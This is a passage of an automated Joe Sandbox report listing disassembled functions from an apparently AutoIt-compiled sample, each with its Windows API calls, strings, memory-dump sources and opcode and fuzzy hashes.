Function 0060C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 005816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00581729
Part of subcall function 005816CF: SelectObject.GDI32(?,00000000), ref: 00581738
Part of subcall function 005816CF: BeginPath.GDI32(?), ref: 0058174F
Part of subcall function 005816CF: SelectObject.GDI32(?,00000000), ref: 00581778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0060C57C
LineTo.GDI32(00000000,00000003,?), ref: 0060C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0060C59E
LineTo.GDI32(00000000,00000000,?), ref: 0060C5AE
EndPath.GDI32(00000000), ref: 0060C5BE
StrokePath.GDI32(00000000), ref: 0060C5CE

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: bf4fcd2c698ed5a8e8f38d7c30c509cacf8bab361806e6cfeba17bb4ed92818a
Instruction ID: 32394379d448f00c1d1dada218b1d2e2a16ecb290c61484279b26663c6611b2e
Opcode Fuzzy Hash: bf4fcd2c698ed5a8e8f38d7c30c509cacf8bab361806e6cfeba17bb4ed92818a
Instruction Fuzzy Hash: 1E111E7600410DBFEF129F90DC88FDA7F6EEB08354F048062F91856160D771AEA5DBA0

Function 005A07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 005A07EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 005A07F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 005A07FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 005A080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 005A0812
MapVirtualKeyW.USER32(00000012,00000000), ref: 005A081A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: ee1e35d62838e5464c0213d98ef4515fd30da252cafd5795bf0cea2b508c0380
Instruction ID: 3d0b36ee5028a6b1d4f87318fe4e59965ee8f1ec2885c2f8efb00f0d79853fb6
Opcode Fuzzy Hash: ee1e35d62838e5464c0213d98ef4515fd30da252cafd5795bf0cea2b508c0380
Instruction Fuzzy Hash: 34016CB09017597DE3008F5A8C85B52FFA8FF59354F04411BA15C47941C7F5A864CBE5

Function 005E59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005E59B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005E59CA
GetWindowThreadProcessId.USER32(?,?), ref: 005E59D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005E59E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005E59F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005E59F9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d0473322418551e85fdfd1e3c28f9a81f11b8244834a7f5b2c6d92d6773ab525
Instruction ID: 11d48386e35f24006541e7e524261057e6841b673cba2ef1e30a963de2b0a063
Opcode Fuzzy Hash: d0473322418551e85fdfd1e3c28f9a81f11b8244834a7f5b2c6d92d6773ab525
Instruction Fuzzy Hash: 0DF01D32241158BBFB215B929C0EEEF7A7DEBC6B11F04415AFA0591050EBE41A5186B5

Function 005E77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 005E77FE
EnterCriticalSection.KERNEL32(?,?,0058C2B6,?,?), ref: 005E780F
TerminateThread.KERNEL32(00000000,000001F6,?,0058C2B6,?,?), ref: 005E781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,0058C2B6,?,?), ref: 005E7829

Part of subcall function 005E71F0: CloseHandle.KERNEL32(00000000,?,005E7836,?,0058C2B6,?,?), ref: 005E71FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 005E783C
LeaveCriticalSection.KERNEL32(?,?,0058C2B6,?,?), ref: 005E7843

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 25116c518bf2c5a1806b21b9bc353cb8bbdf00c7b989bfd4cec769b75649de4c
Instruction ID: 20dba48b4ec350304c04cc1b59df4c733ea2c407bc24c1af5ebf85b19fa80dac
Opcode Fuzzy Hash: 25116c518bf2c5a1806b21b9bc353cb8bbdf00c7b989bfd4cec769b75649de4c
Instruction Fuzzy Hash: F5F0E232448256ABEB152B64EC8CAEB3B3AFF48302F186022F503910A0DBF95941CB60

Function 005D954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 005D9555
UnloadUserProfile.USERENV(?,?), ref: 005D9561
CloseHandle.KERNEL32(?), ref: 005D956A
CloseHandle.KERNEL32(?), ref: 005D9572
GetProcessHeap.KERNEL32(00000000,?), ref: 005D957B
HeapFree.KERNEL32(00000000), ref: 005D9582

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 3e5a4f30c055117695a3a3d92f20f6591b90092a7feb56a85a18315666d429c8
Instruction ID: a8b395e49cf7242b96cbdcf4b742df6685414e64137a3052951e3be7fe146620
Opcode Fuzzy Hash: 3e5a4f30c055117695a3a3d92f20f6591b90092a7feb56a85a18315666d429c8
Instruction Fuzzy Hash: 78E0ED36104105BBEF011FE1EC0D995BF3AFF497217189222F22581070CBB654A0DB50

Function 005F8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005F8CFD
CharUpperBuffW.USER32(?,?), ref: 005F8E0C
VariantClear.OLEAUT32(?), ref: 005F8F84

Part of subcall function 005E7B1D: VariantInit.OLEAUT32(00000000), ref: 005E7B5D
Part of subcall function 005E7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 005E7B66
Part of subcall function 005E7B1D: VariantClear.OLEAUT32(00000000), ref: 005E7B72

Strings

Incorrect Parameter format, xrefs: 005F8D35, 005F8EF7
AUTOIT.ERROR, xrefs: 005F8E12

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 00cc1d538b1c136324405bd94702d03b0d486916780f91c61ba534defab74263
Instruction ID: 937729d4744b119802f8b8cc1cbd68c8750ca2b12f899c44b5f9985c1b9e0c46
Opcode Fuzzy Hash: 00cc1d538b1c136324405bd94702d03b0d486916780f91c61ba534defab74263
Instruction Fuzzy Hash: DC917C706047069FCB10DF24C48496ABBE9FFC9314F04896EF9899B3A1DB34E945CB92

Function 005E323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059436A: _wcscpy.LIBCMT ref: 0059438D

_memset.LIBCMT ref: 005E332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005E335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005E3410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005E343E

Strings

0, xrefs: 005E331A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 09d5b8e39fc7ce3f5e5ac96ac41d1a0c635c902f0b0268f35ff3d48317d4b1e9
Instruction ID: 86ec37eb5c966a63c3d175538cfb1b5a4f3f986839dbc90c71203c411b3f21f5
Opcode Fuzzy Hash: 09d5b8e39fc7ce3f5e5ac96ac41d1a0c635c902f0b0268f35ff3d48317d4b1e9
Instruction Fuzzy Hash: 0251BF316083819BDB1A9F2AC84DA6BBFE5BB85360F04492DF8D5931E1DB70CE44CB52

Function 005E2EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E2F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005E2F83
DeleteMenu.USER32(?,00000007,00000000), ref: 005E2FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00647890,00000000), ref: 005E3012

Strings

0, xrefs: 005E2F5C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 5d1f8992b7f519efff56102fe8623eb9d7ccc9ccedc51bf51cccf0101c12dce3
Instruction ID: ab779ac929480c694013540fc176fa61e1d052be90832d87a845b9bb762ca63f
Opcode Fuzzy Hash: 5d1f8992b7f519efff56102fe8623eb9d7ccc9ccedc51bf51cccf0101c12dce3
Instruction Fuzzy Hash: 6941D3311043829FD728DF25C849B5ABFE9BFC4310F044A1EF4A597291DB70E904CB52

Function 005D9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 005DB79A: GetClassNameW.USER32(?,?,000000FF), ref: 005DB7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005D9ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005D9ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 005D9B0F

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

Strings

ListBox, xrefs: 005D9A8B
ComboBox, xrefs: 005D9A56

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 322be084d74d21e9343185b6abebd4e31a264ac5dbaf29d834a01e7b2d2a99f9
Instruction ID: 3c7289a5e630c66c2c6fdbbe8a3b07aa94b021f196d4acc153073c888a509c48
Opcode Fuzzy Hash: 322be084d74d21e9343185b6abebd4e31a264ac5dbaf29d834a01e7b2d2a99f9
Instruction Fuzzy Hash: 4721E471940105AFEF24ABA8DC49CFEBF69FF82360F15411BF825972D1DB344D459660

Function 00606A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00582111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0058214F
Part of subcall function 00582111: GetStockObject.GDI32(00000011), ref: 00582163
Part of subcall function 00582111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0058216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00606A86
LoadLibraryW.KERNEL32(?), ref: 00606A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00606AA2
DestroyWindow.USER32(?), ref: 00606AAA

Strings

SysAnimate32, xrefs: 00606A61

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: ffa6abb69e444a9b1cb4c25d6a4fd80361496e91d0130721440b6ad09237f8d0
Instruction ID: 8770b1f2c31716d58a3463eade7bee817c49107526e3140b80cba6cfe9336883
Opcode Fuzzy Hash: ffa6abb69e444a9b1cb4c25d6a4fd80361496e91d0130721440b6ad09237f8d0
Instruction Fuzzy Hash: 0221B071340209AFEF14AE64DC40EFB77AAEB49324F109619FA10A22D1D3719C6197A0

Function 005E7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 005E7377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005E73AA
GetStdHandle.KERNEL32(0000000C), ref: 005E73BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005E73F6

Strings

nul, xrefs: 005E73F1

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 3f6ff09fd179b0af401258dd67808316dbd600a1e9a5783cd31ac53f5f9c2d81
Instruction ID: b3270cd7a177422237fccd4752317f3acd386e6dce17ac325227c8afe7991a25
Opcode Fuzzy Hash: 3f6ff09fd179b0af401258dd67808316dbd600a1e9a5783cd31ac53f5f9c2d81
Instruction Fuzzy Hash: 6321717050438AABEB248F6ADC05A9A7FA5BF4C720F204E59FDE0D72D0D7B09950DB50

Function 005E7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 005E7444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005E7476
GetStdHandle.KERNEL32(000000F6), ref: 005E7487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005E74C1

Strings

nul, xrefs: 005E74BC

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: e9d9b6b7f0d847f8934c521336ce609ab31dc1c7d23860d2dacab1cb2e9c8be7
Instruction ID: 072cb0c06f8b349c56715b1d0123ff59a38244d4a4d6a228ae7503e99c412768
Opcode Fuzzy Hash: e9d9b6b7f0d847f8934c521336ce609ab31dc1c7d23860d2dacab1cb2e9c8be7
Instruction Fuzzy Hash: F321B27150838E9BDF289F6A9C48A997FA8BF49720F204A19FDE0D72D0DBB09841C750

Function 005EB283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005EB297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 005EB2EB
__swprintf.LIBCMT ref: 005EB304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00610980), ref: 005EB342

Strings

%lu, xrefs: 005EB2FE

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 393fedfe82e6398d0adb756b880a4f8a51cf290bd07fd179f882ee62eb5e0e22
Instruction ID: 72272cc7587c5c5fd4e5dc8c4c27c47a339c981ea842f360f97e9631a2f14155
Opcode Fuzzy Hash: 393fedfe82e6398d0adb756b880a4f8a51cf290bd07fd179f882ee62eb5e0e22
Instruction Fuzzy Hash: 17217430A0010AAFDB10EF65C849DEEBBB9FF89704B144469F905E7351DB71EA41CB61

Function 005DAC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

Part of subcall function 005DAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 005DAA6F
Part of subcall function 005DAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 005DAA82
Part of subcall function 005DAA52: GetCurrentThreadId.KERNEL32 ref: 005DAA89
Part of subcall function 005DAA52: AttachThreadInput.USER32(00000000), ref: 005DAA90

GetFocus.USER32 ref: 005DAC2A

Part of subcall function 005DAA9B: GetParent.USER32(?), ref: 005DAAA9

GetClassNameW.USER32(?,?,00000100), ref: 005DAC73
EnumChildWindows.USER32(?,005DACEB), ref: 005DAC9B
__swprintf.LIBCMT ref: 005DACB5

Strings

%s%d, xrefs: 005DACAF

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: a300e968fcc0e42b97c1570276ecb50e3cf27edc7908dc7f1f19032bc5b65a2b
Instruction ID: 5dd6929413e5ba56500571ddec796cb95632b3c1aab7f5e08596c1f59c0fdcb5
Opcode Fuzzy Hash: a300e968fcc0e42b97c1570276ecb50e3cf27edc7908dc7f1f19032bc5b65a2b
Instruction Fuzzy Hash: BE11E774200206ABDF21BFA4CD8AFEE3B6DBB84310F044077FD089A252CA705945DB75

Function 005E22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 005E2318

Strings

REMOVE, xrefs: 005E231E
APPEND, xrefs: 005E2351
KEYS, xrefs: 005E232F
EXISTS, xrefs: 005E2340

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: d130ea69d97bad7a80c56381ec0f4953ef100a82ec8c926ac78eeb63b0e9c02f
Instruction ID: 126debd5a5410c72e701cfffc6eed25424c5831010089591e274fb08a41958f7
Opcode Fuzzy Hash: d130ea69d97bad7a80c56381ec0f4953ef100a82ec8c926ac78eeb63b0e9c02f
Instruction Fuzzy Hash: 12118E7091011E9FCF04EF94C9914EEBBB9FF5A304F209469E850A72A1EB325D06CF80

Function 005FF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005FF2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 005FF320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 005FF453
CloseHandle.KERNEL32(?), ref: 005FF4D4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: e5cd9267a60e2bbbdb171b004790a58b29650a1d9c93b1641fc2ecdef6da976b
Instruction ID: 01dcfb486f04ee29fcb2dda678d8be391dd151aa716c18094deff8169bc677fe
Opcode Fuzzy Hash: e5cd9267a60e2bbbdb171b004790a58b29650a1d9c93b1641fc2ecdef6da976b
